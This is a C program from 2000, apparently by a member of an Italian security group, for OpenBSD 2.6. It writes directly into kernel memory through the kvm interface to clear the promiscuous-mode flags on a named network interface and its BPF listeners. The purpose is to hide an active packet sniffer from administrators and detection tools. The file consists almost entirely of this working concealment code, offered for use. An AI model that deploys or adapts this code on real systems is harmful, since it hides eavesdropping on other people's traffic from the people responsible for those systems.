Total obscurity for BPF Promisc Mode. OpenBSD Port.
4075e9176076c0914106ea44b5e66b037da9891ef3eb9c883807688ff1af19b2
/*
* Name: Promisc Mode Obscurity via kvm
* Date: May 23 03:46:51 2000
* Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
*
* SoftProject Digital Security for Y2K
* Sikurezza.org Italian Security Mailing List
*
* COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
* Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
*
* Tested on: OpenBSD 2.6 kern#0 i386
*
* cc obsd_obscura.c -lkvm
*/
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <kvm.h>
#include <err.h>
#include <sysexits.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/bpfdesc.h>
#define Error(x) errx(EX_UNAVAILABLE, x);
struct nlist list[] = {
{"_ifnet"},
{NULL}
};
void
usage(char *arg)
{
printf( "OpenBSD - Promisc Total Obscurity\n"
"---------------------------------\n\n"
"Coded By pIGpEN / s0FtPj Y2k\n\n");
printf("%s <interface>\n", arg);
exit(0);
}
void
bpf_zero(kvm_t *kd, struct ifnet *ifp)
{
struct bpf_if ibpf;
struct bpf_d dbpf, *pdbpf;
int count = 0;
kvm_read(kd, (u_long) ifp->if_bpf, &ibpf, sizeof ibpf);
for(pdbpf = ibpf.bif_dlist; pdbpf; pdbpf = dbpf.bd_next) {
kvm_read(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);
printf("#%d listener has %s promisc mode enabled",
++count, (!dbpf.bd_promisc) ? "no " : " ");
if(dbpf.bd_promisc) {
printf(" (changed)");
dbpf.bd_promisc = 0;
kvm_write(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);
}
putchar('\n');
}
}
int
main(int argc, char **argv)
{
kvm_t *kd;
struct ifnet_head ifh;
struct ifnet ifc, *ifp;
if(argc != 2)
usage(argv[0]);
if(!(kd=kvm_open(NULL, NULL, NULL, O_RDWR, argv[0])))
Error("kvm_open()");
if(kvm_nlist(kd, list) == -1)
Error("kvm_nlist()");
if(!list[0].n_value)
Error("checking n_value");
kvm_read(kd, list[0].n_value, &ifh, sizeof ifh);
for(ifp = ifh.tqh_first; ifp; ifp = ifc.if_list.tqe_next) {
kvm_read(kd, (u_long) ifp, &ifc, sizeof ifc);
if(!strcmp(argv[1], ifc.if_xname)) {
printf("%s found ... promisc mode ", ifc.if_xname);
if(ifc.if_flags & IFF_PROMISC) {
printf("(found)\n");
if(ifc.if_pcount)
/* Like in FreeBSD version, you can do a
* perfect thing by decreasing for each
* descriptor found
*/
ifc.if_pcount = 0;
ifc.if_flags &= ~IFF_PROMISC;
kvm_write(kd, (u_long) ifp, &ifc, sizeof ifc);
printf("BPF Analysis for %s interface\n",
ifc.if_xname);
bpf_zero(kd, &ifc);
}else
printf("(not found)\n");
}else
printf("skipping -> %s\n", ifc.if_xname);
}
kvm_close(kd);
return 0;
}